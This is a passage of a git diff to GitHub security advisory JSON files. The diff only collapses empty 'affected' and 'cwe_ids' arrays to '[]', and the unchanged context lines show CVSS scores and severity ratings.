"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4562-f76f-q78f/GHSA-4562-f76f-q78f.json b/advisories/unreviewed/2022/05/GHSA-4562-f76f-q78f/GHSA-4562-f76f-q78f.json index 12cc12c5056..c7a67c2ecf6 100644 --- a/advisories/unreviewed/2022/05/GHSA-4562-f76f-q78f/GHSA-4562-f76f-q78f.json +++ b/advisories/unreviewed/2022/05/GHSA-4562-f76f-q78f/GHSA-4562-f76f-q78f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-45vj-xfvh-24j4/GHSA-45vj-xfvh-24j4.json b/advisories/unreviewed/2022/05/GHSA-45vj-xfvh-24j4/GHSA-45vj-xfvh-24j4.json index d08afbc9a87..3acc6c5b628 100644 --- a/advisories/unreviewed/2022/05/GHSA-45vj-xfvh-24j4/GHSA-45vj-xfvh-24j4.json +++ b/advisories/unreviewed/2022/05/GHSA-45vj-xfvh-24j4/GHSA-45vj-xfvh-24j4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-468j-vwp3-54w7/GHSA-468j-vwp3-54w7.json b/advisories/unreviewed/2022/05/GHSA-468j-vwp3-54w7/GHSA-468j-vwp3-54w7.json index 0f67f352fe8..5346676df34 100644 --- a/advisories/unreviewed/2022/05/GHSA-468j-vwp3-54w7/GHSA-468j-vwp3-54w7.json +++ b/advisories/unreviewed/2022/05/GHSA-468j-vwp3-54w7/GHSA-468j-vwp3-54w7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-489v-q93q-hh9m/GHSA-489v-q93q-hh9m.json b/advisories/unreviewed/2022/05/GHSA-489v-q93q-hh9m/GHSA-489v-q93q-hh9m.json index 9d502d3ee20..8d15ae36579 100644 --- a/advisories/unreviewed/2022/05/GHSA-489v-q93q-hh9m/GHSA-489v-q93q-hh9m.json +++ b/advisories/unreviewed/2022/05/GHSA-489v-q93q-hh9m/GHSA-489v-q93q-hh9m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-48wc-j2j8-q9cr/GHSA-48wc-j2j8-q9cr.json b/advisories/unreviewed/2022/05/GHSA-48wc-j2j8-q9cr/GHSA-48wc-j2j8-q9cr.json index 9a4f41cde28..0ceff192587 100644 --- a/advisories/unreviewed/2022/05/GHSA-48wc-j2j8-q9cr/GHSA-48wc-j2j8-q9cr.json +++ b/advisories/unreviewed/2022/05/GHSA-48wc-j2j8-q9cr/GHSA-48wc-j2j8-q9cr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-49gj-9j85-2xwr/GHSA-49gj-9j85-2xwr.json b/advisories/unreviewed/2022/05/GHSA-49gj-9j85-2xwr/GHSA-49gj-9j85-2xwr.json index 6650d7069f7..5bffa8a45e1 100644 --- a/advisories/unreviewed/2022/05/GHSA-49gj-9j85-2xwr/GHSA-49gj-9j85-2xwr.json +++ b/advisories/unreviewed/2022/05/GHSA-49gj-9j85-2xwr/GHSA-49gj-9j85-2xwr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4c3h-7364-324h/GHSA-4c3h-7364-324h.json b/advisories/unreviewed/2022/05/GHSA-4c3h-7364-324h/GHSA-4c3h-7364-324h.json index 0988d592ed5..9bd7508bd9c 100644 --- a/advisories/unreviewed/2022/05/GHSA-4c3h-7364-324h/GHSA-4c3h-7364-324h.json +++ b/advisories/unreviewed/2022/05/GHSA-4c3h-7364-324h/GHSA-4c3h-7364-324h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4cq3-3qxv-x93w/GHSA-4cq3-3qxv-x93w.json b/advisories/unreviewed/2022/05/GHSA-4cq3-3qxv-x93w/GHSA-4cq3-3qxv-x93w.json index fad1ce0c27e..7a66c07fd9b 100644 --- a/advisories/unreviewed/2022/05/GHSA-4cq3-3qxv-x93w/GHSA-4cq3-3qxv-x93w.json +++ b/advisories/unreviewed/2022/05/GHSA-4cq3-3qxv-x93w/GHSA-4cq3-3qxv-x93w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4f33-3h34-c9hp/GHSA-4f33-3h34-c9hp.json b/advisories/unreviewed/2022/05/GHSA-4f33-3h34-c9hp/GHSA-4f33-3h34-c9hp.json index 1b319aa8a26..34480add480 100644 --- a/advisories/unreviewed/2022/05/GHSA-4f33-3h34-c9hp/GHSA-4f33-3h34-c9hp.json +++ b/advisories/unreviewed/2022/05/GHSA-4f33-3h34-c9hp/GHSA-4f33-3h34-c9hp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4f6g-5j2m-r93v/GHSA-4f6g-5j2m-r93v.json b/advisories/unreviewed/2022/05/GHSA-4f6g-5j2m-r93v/GHSA-4f6g-5j2m-r93v.json index 3072cf75906..6404885aa00 100644 --- a/advisories/unreviewed/2022/05/GHSA-4f6g-5j2m-r93v/GHSA-4f6g-5j2m-r93v.json +++ b/advisories/unreviewed/2022/05/GHSA-4f6g-5j2m-r93v/GHSA-4f6g-5j2m-r93v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4g29-9cr3-v367/GHSA-4g29-9cr3-v367.json b/advisories/unreviewed/2022/05/GHSA-4g29-9cr3-v367/GHSA-4g29-9cr3-v367.json index feba9125cba..518b30bfc28 100644 --- a/advisories/unreviewed/2022/05/GHSA-4g29-9cr3-v367/GHSA-4g29-9cr3-v367.json +++ b/advisories/unreviewed/2022/05/GHSA-4g29-9cr3-v367/GHSA-4g29-9cr3-v367.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4j5f-hgv3-4fqh/GHSA-4j5f-hgv3-4fqh.json b/advisories/unreviewed/2022/05/GHSA-4j5f-hgv3-4fqh/GHSA-4j5f-hgv3-4fqh.json index 0ead6a5a361..8c0b65b2ea1 100644 --- a/advisories/unreviewed/2022/05/GHSA-4j5f-hgv3-4fqh/GHSA-4j5f-hgv3-4fqh.json +++ b/advisories/unreviewed/2022/05/GHSA-4j5f-hgv3-4fqh/GHSA-4j5f-hgv3-4fqh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4mpm-grm8-3v5m/GHSA-4mpm-grm8-3v5m.json b/advisories/unreviewed/2022/05/GHSA-4mpm-grm8-3v5m/GHSA-4mpm-grm8-3v5m.json index c2abf31ac9f..33b3c353a30 100644 --- a/advisories/unreviewed/2022/05/GHSA-4mpm-grm8-3v5m/GHSA-4mpm-grm8-3v5m.json +++ b/advisories/unreviewed/2022/05/GHSA-4mpm-grm8-3v5m/GHSA-4mpm-grm8-3v5m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4pfp-mmjh-x8v9/GHSA-4pfp-mmjh-x8v9.json b/advisories/unreviewed/2022/05/GHSA-4pfp-mmjh-x8v9/GHSA-4pfp-mmjh-x8v9.json index 6bfce8416dc..9b8eb0ee1d1 100644 --- a/advisories/unreviewed/2022/05/GHSA-4pfp-mmjh-x8v9/GHSA-4pfp-mmjh-x8v9.json +++ b/advisories/unreviewed/2022/05/GHSA-4pfp-mmjh-x8v9/GHSA-4pfp-mmjh-x8v9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4qjw-4283-p49w/GHSA-4qjw-4283-p49w.json b/advisories/unreviewed/2022/05/GHSA-4qjw-4283-p49w/GHSA-4qjw-4283-p49w.json index e07bfce2740..a319caa6715 100644 --- a/advisories/unreviewed/2022/05/GHSA-4qjw-4283-p49w/GHSA-4qjw-4283-p49w.json +++ b/advisories/unreviewed/2022/05/GHSA-4qjw-4283-p49w/GHSA-4qjw-4283-p49w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4rcw-rqxp-x962/GHSA-4rcw-rqxp-x962.json b/advisories/unreviewed/2022/05/GHSA-4rcw-rqxp-x962/GHSA-4rcw-rqxp-x962.json index c1e76e5f4ad..acfc1ec6778 100644 --- a/advisories/unreviewed/2022/05/GHSA-4rcw-rqxp-x962/GHSA-4rcw-rqxp-x962.json +++ b/advisories/unreviewed/2022/05/GHSA-4rcw-rqxp-x962/GHSA-4rcw-rqxp-x962.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4rq7-mpp7-jf3w/GHSA-4rq7-mpp7-jf3w.json b/advisories/unreviewed/2022/05/GHSA-4rq7-mpp7-jf3w/GHSA-4rq7-mpp7-jf3w.json index 2eb36f1385b..97cf0f28149 100644 --- a/advisories/unreviewed/2022/05/GHSA-4rq7-mpp7-jf3w/GHSA-4rq7-mpp7-jf3w.json +++ b/advisories/unreviewed/2022/05/GHSA-4rq7-mpp7-jf3w/GHSA-4rq7-mpp7-jf3w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4rr7-7xpx-xq3f/GHSA-4rr7-7xpx-xq3f.json b/advisories/unreviewed/2022/05/GHSA-4rr7-7xpx-xq3f/GHSA-4rr7-7xpx-xq3f.json index 0d20ad3b578..e4d0a505416 100644 --- a/advisories/unreviewed/2022/05/GHSA-4rr7-7xpx-xq3f/GHSA-4rr7-7xpx-xq3f.json +++ b/advisories/unreviewed/2022/05/GHSA-4rr7-7xpx-xq3f/GHSA-4rr7-7xpx-xq3f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4vg9-ppq4-4286/GHSA-4vg9-ppq4-4286.json b/advisories/unreviewed/2022/05/GHSA-4vg9-ppq4-4286/GHSA-4vg9-ppq4-4286.json index c42598547de..eaf9f17f5a0 100644 --- a/advisories/unreviewed/2022/05/GHSA-4vg9-ppq4-4286/GHSA-4vg9-ppq4-4286.json +++ b/advisories/unreviewed/2022/05/GHSA-4vg9-ppq4-4286/GHSA-4vg9-ppq4-4286.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4vm6-24h2-hx93/GHSA-4vm6-24h2-hx93.json b/advisories/unreviewed/2022/05/GHSA-4vm6-24h2-hx93/GHSA-4vm6-24h2-hx93.json index a2c9d1e2a05..9010f7af163 100644 --- a/advisories/unreviewed/2022/05/GHSA-4vm6-24h2-hx93/GHSA-4vm6-24h2-hx93.json +++ b/advisories/unreviewed/2022/05/GHSA-4vm6-24h2-hx93/GHSA-4vm6-24h2-hx93.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4vpm-5p84-vm6f/GHSA-4vpm-5p84-vm6f.json b/advisories/unreviewed/2022/05/GHSA-4vpm-5p84-vm6f/GHSA-4vpm-5p84-vm6f.json index af807f20477..330d5a8920e 100644 --- a/advisories/unreviewed/2022/05/GHSA-4vpm-5p84-vm6f/GHSA-4vpm-5p84-vm6f.json +++ b/advisories/unreviewed/2022/05/GHSA-4vpm-5p84-vm6f/GHSA-4vpm-5p84-vm6f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4wcq-c4qq-q7xq/GHSA-4wcq-c4qq-q7xq.json b/advisories/unreviewed/2022/05/GHSA-4wcq-c4qq-q7xq/GHSA-4wcq-c4qq-q7xq.json index 37f31925108..93e18317b92 100644 --- a/advisories/unreviewed/2022/05/GHSA-4wcq-c4qq-q7xq/GHSA-4wcq-c4qq-q7xq.json +++ b/advisories/unreviewed/2022/05/GHSA-4wcq-c4qq-q7xq/GHSA-4wcq-c4qq-q7xq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-542q-x7xp-h2g2/GHSA-542q-x7xp-h2g2.json b/advisories/unreviewed/2022/05/GHSA-542q-x7xp-h2g2/GHSA-542q-x7xp-h2g2.json index 4488005fa1f..18ef974b626 100644 --- a/advisories/unreviewed/2022/05/GHSA-542q-x7xp-h2g2/GHSA-542q-x7xp-h2g2.json +++ b/advisories/unreviewed/2022/05/GHSA-542q-x7xp-h2g2/GHSA-542q-x7xp-h2g2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5994-636w-hhx6/GHSA-5994-636w-hhx6.json b/advisories/unreviewed/2022/05/GHSA-5994-636w-hhx6/GHSA-5994-636w-hhx6.json index 875185a5d00..d379b2678a3 100644 --- a/advisories/unreviewed/2022/05/GHSA-5994-636w-hhx6/GHSA-5994-636w-hhx6.json +++ b/advisories/unreviewed/2022/05/GHSA-5994-636w-hhx6/GHSA-5994-636w-hhx6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5cxw-rqrc-8x44/GHSA-5cxw-rqrc-8x44.json b/advisories/unreviewed/2022/05/GHSA-5cxw-rqrc-8x44/GHSA-5cxw-rqrc-8x44.json index d4a6ed859c5..23d73e55b2b 100644 --- a/advisories/unreviewed/2022/05/GHSA-5cxw-rqrc-8x44/GHSA-5cxw-rqrc-8x44.json +++ b/advisories/unreviewed/2022/05/GHSA-5cxw-rqrc-8x44/GHSA-5cxw-rqrc-8x44.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5f3h-v23m-w8qf/GHSA-5f3h-v23m-w8qf.json b/advisories/unreviewed/2022/05/GHSA-5f3h-v23m-w8qf/GHSA-5f3h-v23m-w8qf.json index 6a8db46ad95..6f736cc4058 100644 --- a/advisories/unreviewed/2022/05/GHSA-5f3h-v23m-w8qf/GHSA-5f3h-v23m-w8qf.json +++ b/advisories/unreviewed/2022/05/GHSA-5f3h-v23m-w8qf/GHSA-5f3h-v23m-w8qf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5fh8-wc7h-jjmx/GHSA-5fh8-wc7h-jjmx.json b/advisories/unreviewed/2022/05/GHSA-5fh8-wc7h-jjmx/GHSA-5fh8-wc7h-jjmx.json index e3783993e4b..040b2dc77dc 100644 --- a/advisories/unreviewed/2022/05/GHSA-5fh8-wc7h-jjmx/GHSA-5fh8-wc7h-jjmx.json +++ b/advisories/unreviewed/2022/05/GHSA-5fh8-wc7h-jjmx/GHSA-5fh8-wc7h-jjmx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5prq-4prf-4348/GHSA-5prq-4prf-4348.json b/advisories/unreviewed/2022/05/GHSA-5prq-4prf-4348/GHSA-5prq-4prf-4348.json index c52ccb0f36b..81f5daa4e6f 100644 --- a/advisories/unreviewed/2022/05/GHSA-5prq-4prf-4348/GHSA-5prq-4prf-4348.json +++ b/advisories/unreviewed/2022/05/GHSA-5prq-4prf-4348/GHSA-5prq-4prf-4348.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5prq-xj94-2jrc/GHSA-5prq-xj94-2jrc.json b/advisories/unreviewed/2022/05/GHSA-5prq-xj94-2jrc/GHSA-5prq-xj94-2jrc.json index c192cb42cc6..01a277cb908 100644 --- a/advisories/unreviewed/2022/05/GHSA-5prq-xj94-2jrc/GHSA-5prq-xj94-2jrc.json +++ b/advisories/unreviewed/2022/05/GHSA-5prq-xj94-2jrc/GHSA-5prq-xj94-2jrc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5w44-jhc3-gqqj/GHSA-5w44-jhc3-gqqj.json b/advisories/unreviewed/2022/05/GHSA-5w44-jhc3-gqqj/GHSA-5w44-jhc3-gqqj.json index 1bd8c1a71fe..1eb5953aaf5 100644 --- a/advisories/unreviewed/2022/05/GHSA-5w44-jhc3-gqqj/GHSA-5w44-jhc3-gqqj.json +++ b/advisories/unreviewed/2022/05/GHSA-5w44-jhc3-gqqj/GHSA-5w44-jhc3-gqqj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-62pj-88f8-mrpj/GHSA-62pj-88f8-mrpj.json b/advisories/unreviewed/2022/05/GHSA-62pj-88f8-mrpj/GHSA-62pj-88f8-mrpj.json index ebbea701449..38b51ed4e61 100644 --- a/advisories/unreviewed/2022/05/GHSA-62pj-88f8-mrpj/GHSA-62pj-88f8-mrpj.json +++ b/advisories/unreviewed/2022/05/GHSA-62pj-88f8-mrpj/GHSA-62pj-88f8-mrpj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-63mh-f2pw-589c/GHSA-63mh-f2pw-589c.json b/advisories/unreviewed/2022/05/GHSA-63mh-f2pw-589c/GHSA-63mh-f2pw-589c.json index 41ef3deced6..7abdb560eae 100644 --- a/advisories/unreviewed/2022/05/GHSA-63mh-f2pw-589c/GHSA-63mh-f2pw-589c.json +++ b/advisories/unreviewed/2022/05/GHSA-63mh-f2pw-589c/GHSA-63mh-f2pw-589c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-644r-rpv6-w4x6/GHSA-644r-rpv6-w4x6.json b/advisories/unreviewed/2022/05/GHSA-644r-rpv6-w4x6/GHSA-644r-rpv6-w4x6.json index ab74733402d..e1b090f9dea 100644 --- a/advisories/unreviewed/2022/05/GHSA-644r-rpv6-w4x6/GHSA-644r-rpv6-w4x6.json +++ b/advisories/unreviewed/2022/05/GHSA-644r-rpv6-w4x6/GHSA-644r-rpv6-w4x6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-647q-gc86-99gj/GHSA-647q-gc86-99gj.json b/advisories/unreviewed/2022/05/GHSA-647q-gc86-99gj/GHSA-647q-gc86-99gj.json index 1fa486bc288..a33ff141ccd 100644 --- a/advisories/unreviewed/2022/05/GHSA-647q-gc86-99gj/GHSA-647q-gc86-99gj.json +++ b/advisories/unreviewed/2022/05/GHSA-647q-gc86-99gj/GHSA-647q-gc86-99gj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-649f-3xhr-r5cg/GHSA-649f-3xhr-r5cg.json b/advisories/unreviewed/2022/05/GHSA-649f-3xhr-r5cg/GHSA-649f-3xhr-r5cg.json index d87d449d74f..6a3e64955ec 100644 --- a/advisories/unreviewed/2022/05/GHSA-649f-3xhr-r5cg/GHSA-649f-3xhr-r5cg.json +++ b/advisories/unreviewed/2022/05/GHSA-649f-3xhr-r5cg/GHSA-649f-3xhr-r5cg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-64q7-r539-394p/GHSA-64q7-r539-394p.json b/advisories/unreviewed/2022/05/GHSA-64q7-r539-394p/GHSA-64q7-r539-394p.json index 3d300dbd670..a6e6050e498 100644 --- a/advisories/unreviewed/2022/05/GHSA-64q7-r539-394p/GHSA-64q7-r539-394p.json +++ b/advisories/unreviewed/2022/05/GHSA-64q7-r539-394p/GHSA-64q7-r539-394p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-65qr-c565-757w/GHSA-65qr-c565-757w.json b/advisories/unreviewed/2022/05/GHSA-65qr-c565-757w/GHSA-65qr-c565-757w.json index 3b0226f3ef8..cbc8e5adfb5 100644 --- a/advisories/unreviewed/2022/05/GHSA-65qr-c565-757w/GHSA-65qr-c565-757w.json +++ 